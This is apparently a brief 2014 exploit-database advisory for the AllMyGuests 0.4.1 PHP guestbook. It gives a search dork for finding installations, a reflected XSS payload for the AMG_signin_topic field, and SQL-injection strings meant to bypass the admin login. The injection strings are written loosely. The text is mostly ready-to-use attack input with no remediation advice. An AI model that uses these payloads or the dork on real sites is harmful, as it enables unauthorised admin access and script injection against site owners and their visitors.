|Author: indoushka||, Published: 11-11-2014|
AllMyGuests0.4.1 Multi Vulnerability
Author : indoushka
Vondor : http://www.php-resource.net/
Dork: powered by AllMyGuests © 2003, voice of web
php info :
This vulnerability affects /AllMyGuests0.4.1/index.php.
Discovered by: Scripting (XSS.script).
POST (multipart) input AMG_signin_topic was set to 1" onmouseover=prompt(988847) bad="
The input is reflected inside a tag parameter between double quotes.
Insecure Cookie Handling :
Auth Bypass :
Username : azerty' or '1=1--# Real admin name
Password : demo1 ' or ' 1=1 or admin or any thing
Like us on Facebook :